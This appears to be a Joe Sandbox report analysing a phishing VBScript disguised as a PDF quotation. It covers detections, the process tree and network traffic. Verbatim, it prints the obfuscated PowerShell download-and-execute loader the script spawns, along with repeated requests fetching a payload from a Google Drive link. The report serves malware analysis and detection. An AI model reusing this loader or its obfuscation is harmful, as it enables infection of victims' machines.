Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Urgent Quotation Notification_pdf.vbs

Overview

General Information

Sample name:Urgent Quotation Notification_pdf.vbs
Analysis ID:1522522
MD5:9399cd1db4c7360b891ecc977dfbdc2a
SHA1:968f602adcb6c30b6a6f3520bf90f17d9511e7c7
SHA256:ee0a0898ddb59aa40d7c429d982e56a1ca4847a2872b857a1a3934d316075576
Tags:vbsuser-abuse_ch
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7592 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndDstao riwse,nU.plMuso taaR td .nFRddi llskye l(Mal$tunCIndeT.ar ottKomiC nf aiDraaa ob ckiAcilUnniTartUnfyske, no$RatP crrPraoOffsD etKvah anoKondBaaosprnstitOphi occ msAlt) ed ';$Prosthodontics=$Dutiable;Trolddomskunsternes (Fabrikskomplekserne 'Mil$Oveg BalHngoFotbPrma oL Pr:,acs stI .hdCouOundN snIMa a B sH,u= En( CotHjuesttsUnsTExi-KispRaaaCout skHRag Ebu$,omP ierK.io HusLant enHT kOTredD rO Brnsk,TAutIUn c PasHa,) Re ');while (!$sidonias) {Trolddomskunsternes (Fabrikskomplekserne ' K $Gafghkels ioPolbIntasinl.el:El U Dossvrl stiTign TigEtheMk,nUn s Kl=To $stot erM au sye Af ') ;Trolddomskunsternes $Bufferkapaciteterne;Trolddomskunsternes (Fabrikskomplekserne 'V lssoat MiaMatrBettf,j-WatsNislsike svePlepFas Epi4Chi ');Trolddomskunsternes (Fabrikskomplekserne 'F g$P.rgC llGaloHarb C.aItal Fo: G.sBloiHypd aso A,n,tai Nua OvsDem=Clu( ,rTD teAn seartFll-WogPId,aUndtn th su Ild$UnsPCl rBetosprsMyttslah o,oLordUbeoKupnGrotO eiKo cTrisG i)Kah ') ;Trolddomskunsternes (Fabrikskomplekserne 'squ$Audg EilB.aoBorbFesaIn lFac: coOs.rrAf tDewhP ro MacKape dsrE.ta FltKeliIsotErki llc ro= k$ U gse l s os jb osa llBow: UnU Kanra dWeaeBharslucTrarundoPlasVissZoni PsnMedgjus+Bi,+ Al% yp$B sP esrHareForiEvim ncpOpsostar Retdat.HvicDrno FiuI pnReotRec ') ;$Certifiability=$Preimport[$Orthoceratitic];}$Vejlenser=275493;$Cirkelines=30624;Trolddomskunsternes (Fabrikskomplekserne 'For$ FegtimlBraoKilbGolaOlalTo.:s nM ElaCorsHelsOveeWeitsm eOver PriFascpep Tra=Epi AnGRapesemtMus-HovCMauoho,nRevt steVinnAcatMel B r$tykPQu,r.haoBlusB at Rah CyoFlidsuioPron hltO,ei stc isLyk ');Trolddomskunsternes (Fabrikskomplekserne 'Ine$AlagGtel,enoHygb MraNeglClo:CanIdiansolfTr i PrnChaisrktUn.aBehtAfseP ad su l=N g ,jl[Be s,awyChisTuntsl,eNydm sp. ArCvero usnNonvFuteA.erAt tper]ski:Vej:TofFLetrKomoPremVarBEntaUdtsElseFes6 lu4 B sstitcsnrfugistrnsvegDri(Fra$UnsMKisaTassTo.sBraeWhatNyaes.orMusi ascVer) Bo ');Trolddomskunsternes (Fabrikskomplekserne ' dr$BefgsvilHeao ocb p.aBealZi :Un MR ko HyncesiUn s,ontPeli Fos R kOl e .v D g=dor Xip[UdhsV zyGuasB ktPhyeRapmObj.st TFo,e Rux tetGra. MoEMisn Glcstao ldD ni stnFusgbor]ent:kom: emAn nsBasCHe It aIGon. G,GItae sttAl,sburtJusr M.iUdsns mg e( As$ aIK in opfBini.efnsemiflet EfaUndt laesmud.in) Dr ');Trolddomskunsternes (Fabrikskomplekserne 'Brb$D,igB nlPreoHurb,oraRealUni: rTAngrTrao K,u Mev,oie rluPyrrGarsodi1 In5Me,6,ct=sol$AllMB yo O n I i.yrss otNseibagsAp.kopbeMoo. ndsAp usaubin sDiatVanr BoiHosnTe.gAfr(Cra$ProVsyne OdjKonlHjee.ilnDe sToge Norsat,afh$damC W iGe r Miksoge L lGauiBranjobeIn s as)Pen ');Trolddomskunsternes $Trouveurs156;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7752JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_7752.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", CommandLine|base64offset|contains: B-j, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", ProcessId: 7592, ProcessName: wscript.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", CommandLine|base64offset|contains: B-j, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs", ProcessId: 7592, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndDstao riwse,nU.plMuso taaR td .nFRddi llskye l(Mal$tunCI

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-09-30T09:58:13.830927+020028033053Unknown Traffic192.168.2.949710142.250.186.33443TCP
      2024-09-30T09:58:29.041282+020028033053Unknown Traffic192.168.2.949716142.250.186.174443TCP
      2024-09-30T09:58:54.549717+020028033053Unknown Traffic192.168.2.957672142.250.186.174443TCP
      2024-09-30T09:59:04.582563+020028033053Unknown Traffic192.168.2.957674142.250.186.174443TCP
      2024-09-30T09:59:30.054853+020028033053Unknown Traffic192.168.2.957680142.250.186.174443TCP
      2024-09-30T09:59:41.117471+020028033053Unknown Traffic192.168.2.957682142.250.186.174443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
      Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:57674 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:57685 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:57686 version: TLS 1.2
      Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.2635802751.000001D676AE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdbP source: powershell.exe, 00000002.00000002.2635802751.000001D676AB9000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1Host: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57674 -> 142.250.186.174:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49710 -> 142.250.186.33:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57682 -> 142.250.186.174:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49716 -> 142.250.186.174:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57672 -> 142.250.186.174:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:57680 -> 142.250.186.174:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1Host: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: powershell.exe, 00000002.00000002.2637094690.000001D676E0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: app-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn""6 equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
